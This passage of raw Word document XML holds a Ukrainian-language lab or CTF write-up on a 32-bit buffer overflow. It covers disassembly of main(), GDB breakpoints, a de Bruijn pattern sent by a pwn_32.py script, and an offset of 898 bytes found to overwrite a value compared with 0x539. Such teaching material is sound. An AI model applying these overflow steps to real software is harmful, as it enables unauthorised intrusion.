          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>main</w:t>
      </w:r>
      <w:r w:rsidRPr="00221DB7">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58B66770" w14:textId="77777777" w:rsidR="009A58BB" w:rsidRDefault="009A58BB" w:rsidP="009A58BB">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">1) Вивід рядка </w:t>
      </w:r>
      <w:r w:rsidRPr="0023506E">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>"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knock</w:t>
      </w:r>
      <w:r w:rsidRPr="0023506E">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Neo</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="0023506E">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68AB0BBA" w14:textId="77777777" w:rsidR="009A58BB" w:rsidRPr="009A58BB" w:rsidRDefault="009A58BB" w:rsidP="009A58BB">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">2) </w:t>
      </w:r>
      <w:r w:rsidRPr="007B7371">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>З</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>читування вводу</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04EDC8D3" w14:textId="0253EB3B" w:rsidR="009A58BB" w:rsidRPr="00082093" w:rsidRDefault="009A58BB" w:rsidP="009A58BB">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">3) </w:t>
      </w:r>
      <w:r w:rsidRPr="007B7371">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>П</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">орівняння </w:t>
      </w:r>
      <w:r w:rsidRPr="003A5C43">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>cmp</w:t>
      </w:r>
      <w:r w:rsidRPr="003A5C43">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>eax</w:t>
      </w:r>
      <w:r w:rsidRPr="003A5C43">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>, 0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>x</w:t>
      </w:r>
      <w:r w:rsidRPr="003A5C43">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>539"</w:t>
      </w:r>
      <w:r w:rsidRPr="003A5C43">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="003A5C43">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:tab/>
        <w:t>0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>x</w:t>
      </w:r>
      <w:r w:rsidR="008302C5" w:rsidRPr="00082093">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>804</w:t>
      </w:r>
      <w:r w:rsidR="00082093">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>a</w:t>
      </w:r>
      <w:r w:rsidR="008302C5" w:rsidRPr="00082093">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>04</w:t>
      </w:r>
      <w:r w:rsidR="00082093">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>f</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="313DE97F" w14:textId="60FB6B3D" w:rsidR="009A58BB" w:rsidRPr="00082093" w:rsidRDefault="009A58BB" w:rsidP="009A58BB">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">4) </w:t>
      </w:r>
      <w:r w:rsidR="005F1F7D">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>esp = ebp-0x10</w:t>
      </w:r>
      <w:r w:rsidRPr="003A5C43">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="003A5C43">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00A46459">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00D31D94">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00D31D94">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00082093">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>x</w:t>
      </w:r>
      <w:r w:rsidR="0035077F" w:rsidRPr="0035077F">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>804</w:t>
      </w:r>
      <w:r w:rsidR="0035077F">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>a</w:t>
      </w:r>
      <w:r w:rsidR="0035077F" w:rsidRPr="0035077F">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>077</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34B848AC" w14:textId="4A605717" w:rsidR="007043E4" w:rsidRDefault="00364D73">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00400F3E">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">5) </w:t>
      </w:r>
      <w:r w:rsidR="00540F15">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">Відновлення регістру </w:t>
      </w:r>
      <w:r w:rsidR="00540F15">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ecx</w:t>
      </w:r>
      <w:r w:rsidR="00540F15" w:rsidRPr="00400F3E">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00540F15">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>зі стеку</w:t>
      </w:r>
      <w:r w:rsidR="00540F15">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00540F15">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00400F3E" w:rsidRPr="00082093">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>0</w:t>
      </w:r>
      <w:r w:rsidR="00400F3E">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>x</w:t>
      </w:r>
      <w:r w:rsidR="00400F3E" w:rsidRPr="0035077F">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>804</w:t>
      </w:r>
      <w:r w:rsidR="00400F3E">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>a</w:t>
      </w:r>
      <w:r w:rsidR="00400F3E" w:rsidRPr="0035077F">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>07</w:t>
      </w:r>
      <w:r w:rsidR="00400F3E">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>a</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="562B0B66" w14:textId="12F842AD" w:rsidR="00B40B99" w:rsidRDefault="00A90D6B" w:rsidP="00B40B99">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>6</w:t>
      </w:r>
      <w:r w:rsidR="00B40B99" w:rsidRPr="00400F3E">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">) </w:t>
      </w:r>
      <w:r w:rsidR="00B40B99">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">Відновлення регістру </w:t>
      </w:r>
      <w:r w:rsidR="00B40B99">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>e</w:t>
      </w:r>
      <w:r w:rsidR="00941FC5">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>b</w:t>
      </w:r>
      <w:r w:rsidR="00B40B99">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>x</w:t>
      </w:r>
      <w:r w:rsidR="00B40B99" w:rsidRPr="00400F3E">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00B40B99">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>зі стеку</w:t>
      </w:r>
      <w:r w:rsidR="00B40B99">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00B40B99" w:rsidRPr="00082093">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>0</w:t>
      </w:r>
      <w:r w:rsidR="00B40B99">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>x</w:t>
      </w:r>
      <w:r w:rsidR="00B40B99" w:rsidRPr="0035077F">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>804</w:t>
      </w:r>
      <w:r w:rsidR="00B40B99">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>a</w:t>
      </w:r>
      <w:r w:rsidR="00B40B99" w:rsidRPr="0035077F">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>07</w:t>
      </w:r>
      <w:r w:rsidR="005966B7">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>b</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49A8C087" w14:textId="77777777" w:rsidR="00400F3E" w:rsidRDefault="00400F3E">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="59D476B3" w14:textId="77777777" w:rsidR="007043E4" w:rsidRDefault="007043E4">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7C432D20" w14:textId="77777777" w:rsidR="00BB3DB3" w:rsidRPr="00C046B4" w:rsidRDefault="00BB3DB3" w:rsidP="00BB3DB3">
      <w:r>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>Тепер можемо поставити брейкпоінти на цих адресах</w:t>
      </w:r>
      <w:r w:rsidRPr="00F372FF">
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38272341" w14:textId="4208C368" w:rsidR="00BB3DB3" w:rsidRPr="0066385E" w:rsidRDefault="00BB3DB3" w:rsidP="00BB3DB3">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>br</w:t>
      </w:r>
      <w:r w:rsidRPr="004278C2">
        <w:t xml:space="preserve">* </w:t>
      </w:r>
      <w:r w:rsidR="003C3DCB" w:rsidRPr="003A5C43">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>0</w:t>
      </w:r>
      <w:r w:rsidR="003C3DCB">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>x</w:t>
      </w:r>
      <w:r w:rsidR="003C3DCB" w:rsidRPr="00082093">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>804</w:t>
      </w:r>
      <w:r w:rsidR="003C3DCB">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>a</w:t>
      </w:r>
      <w:r w:rsidR="003C3DCB" w:rsidRPr="00082093">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>04</w:t>
      </w:r>
      <w:r w:rsidR="003C3DCB">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>f</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74E73D45" w14:textId="0071DD91" w:rsidR="0078229E" w:rsidRPr="0078229E" w:rsidRDefault="00BB3DB3" w:rsidP="0078229E">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">br* </w:t>
      </w:r>
      <w:r w:rsidR="00A315EE" w:rsidRPr="00082093">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>0</w:t>
      </w:r>
      <w:r w:rsidR="00A315EE">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>x</w:t>
      </w:r>
      <w:r w:rsidR="00A315EE" w:rsidRPr="0035077F">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>804</w:t>
      </w:r>
      <w:r w:rsidR="00A315EE">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>a</w:t>
      </w:r>
      <w:r w:rsidR="00A315EE" w:rsidRPr="0035077F">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>077</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4749AD09" w14:textId="0EF6BDC2" w:rsidR="0078229E" w:rsidRPr="0078229E" w:rsidRDefault="0078229E">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">br* </w:t>
      </w:r>
      <w:r w:rsidRPr="00082093">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>x</w:t>
      </w:r>
      <w:r w:rsidRPr="0035077F">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>804</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>a</w:t>
      </w:r>
      <w:r w:rsidRPr="0035077F">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>07</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>a</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1529000F" w14:textId="5ED94F26" w:rsidR="0078229E" w:rsidRPr="0078229E" w:rsidRDefault="0078229E" w:rsidP="0078229E">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">br* </w:t>
      </w:r>
      <w:r w:rsidRPr="00082093">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>x</w:t>
      </w:r>
      <w:r w:rsidRPr="0035077F">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>804</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>a</w:t>
      </w:r>
      <w:r w:rsidRPr="0035077F">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>07</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>b</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66CE5893" w14:textId="0AA8F9BA" w:rsidR="0078229E" w:rsidRPr="0078229E" w:rsidRDefault="005C68F4">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0F810DE5" wp14:editId="64FEBBF1">
            <wp:extent cx="5009524" cy="1495238"/>
            <wp:effectExtent l="0" t="0" r="635" b="0"/>
            <wp:docPr id="7885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7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AFB2" w14:textId="77777777" w:rsidR="007043E4" w:rsidRDefault="007043E4">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3C8DBAD9" w14:textId="77777777" w:rsidR="00AA7AF1" w:rsidRPr="008060F7" w:rsidRDefault="00AA7AF1" w:rsidP="00AA7AF1">
      <w:r>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">Продебажимо в </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>GDB</w:t>
      </w:r>
      <w:r w:rsidRPr="008060F7">
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> записавши послідовність де Брейна в </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>STDIN</w:t>
      </w:r>
      <w:r w:rsidRPr="008060F7">
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2445F997" w14:textId="77777777" w:rsidR="00AA7AF1" w:rsidRPr="007134A9" w:rsidRDefault="00AA7AF1" w:rsidP="00AA7AF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6E7C72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6E7C72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E7C72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5000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p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E7C7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6E7C7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6E7C7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E7C7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6E7C7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2B84D8C5" w14:textId="054F6D74" w:rsidR="00AA7AF1" w:rsidRDefault="00AA7AF1" w:rsidP="00AA7AF1">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">$ </w:t>
      </w:r>
      <w:r w:rsidRPr="00D11184">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>python3 pwn_</w:t>
      </w:r>
      <w:r w:rsidR="00A50E9E">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>32</w:t>
      </w:r>
      <w:r w:rsidRPr="00D11184">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.py</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CB2A5C2" w14:textId="77777777" w:rsidR="00AA7AF1" w:rsidRDefault="00AA7AF1">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0943213F" w14:textId="77777777" w:rsidR="00485D08" w:rsidRDefault="00485D08">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2687F3CE" w14:textId="77777777" w:rsidR="006841C5" w:rsidRDefault="006841C5">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5DF16168" w14:textId="77777777" w:rsidR="006841C5" w:rsidRDefault="006841C5">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="03659DD1" w14:textId="77777777" w:rsidR="006841C5" w:rsidRDefault="006841C5">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="556C9862" w14:textId="77777777" w:rsidR="006841C5" w:rsidRDefault="006841C5">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="314BD996" w14:textId="77777777" w:rsidR="006841C5" w:rsidRDefault="006841C5">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4D94514C" w14:textId="04C66DEE" w:rsidR="006841C5" w:rsidRDefault="006841C5">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C41877">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Перший брейкпоінт. Бачимо, що </w:t>
      </w:r>
      <w:r w:rsidR="00A97456">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>e</w:t>
      </w:r>
      <w:r w:rsidRPr="00C41877">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">ax = </w:t>
      </w:r>
      <w:r w:rsidRPr="007B1717">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>"aiza"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D2B7A01" w14:textId="473DBCFC" w:rsidR="00485D08" w:rsidRPr="00AA7AF1" w:rsidRDefault="00485D08">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="50DF60D8" wp14:editId="39B65C89">
            <wp:extent cx="6645910" cy="4599305"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="133111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7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C86A" w14:textId="77777777" w:rsidR="007043E4" w:rsidRPr="008302C5" w:rsidRDefault="007043E4"/>
    <w:p w14:paraId="16930AFA" w14:textId="7664FA7C" w:rsidR="00C41877" w:rsidRPr="00C41877" w:rsidRDefault="00C41877" w:rsidP="00C41877">
      <w:r w:rsidRPr="00C41877">
        <w:t xml:space="preserve">Знайдемо позицію байтів </w:t>
      </w:r>
      <w:r w:rsidR="001D7BC4" w:rsidRPr="001D7BC4">
        <w:t>"aiza"</w:t>
      </w:r>
      <w:r w:rsidRPr="00C41877">
        <w:t xml:space="preserve"> в послідовності:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3258986B" w14:textId="77777777" w:rsidR="002C1BB6" w:rsidRPr="002C1BB6" w:rsidRDefault="002C1BB6" w:rsidP="002C1BB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2C1BB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2C1B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C1BB6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_find</w:t>
      </w:r>
      <w:r w:rsidRPr="002C1B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C1BB6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iza"</w:t>
      </w:r>
      <w:r w:rsidRPr="002C1BB6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</w:p>
    <w:p w14:paraId="7C67E75D" w14:textId="77777777" w:rsidR="00341796" w:rsidRDefault="00341796">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="63B49C2F" w14:textId="77777777" w:rsidR="00BC4438" w:rsidRDefault="00341796">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="32657BD7" wp14:editId="7A4CB75A">
            <wp:extent cx="4171429" cy="619048"/>
            <wp:effectExtent l="0" t="0" r="635" b="0"/>
            <wp:docPr id="12941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20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1C68" w14:textId="10C1F41C" w:rsidR="00734B87" w:rsidRPr="00734B87" w:rsidRDefault="00734B87" w:rsidP="00734B87">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Отже, </w:t>
      </w:r>
      <w:r w:rsidR="00E1522E" w:rsidRPr="00E67AC9">
        <w:t>898</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> – розм</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>ір буфера, який треба переповнити. Саме після</w:t>
      </w:r>
      <w:r w:rsidR="00E67AC9" w:rsidRPr="00E67AC9">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> 89</w:t>
      </w:r>
      <w:r w:rsidR="00E67AC9" w:rsidRPr="004352D6">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>8</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> довільних байтів, повинне йти значеня </w:t>
      </w:r>
      <w:r w:rsidRPr="00325DC9">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">1137, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">щоб задовільнити умову </w:t>
      </w:r>
      <w:r w:rsidRPr="0049726A">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>cmp</w:t>
      </w:r>
      <w:r w:rsidRPr="00325DC9">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>eax</w:t>
      </w:r>
      <w:r w:rsidRPr="00325DC9">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="0049726A">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>x</w:t>
      </w:r>
      <w:r w:rsidRPr="0049726A">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>539</w:t>
      </w:r>
      <w:r w:rsidRPr="00325DC9">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:r w:rsidRPr="0049726A">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="428D95C7" w14:textId="77777777" w:rsidR="00734B87" w:rsidRPr="00734B87" w:rsidRDefault="00734B87" w:rsidP="00734B87">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
    </w:p>
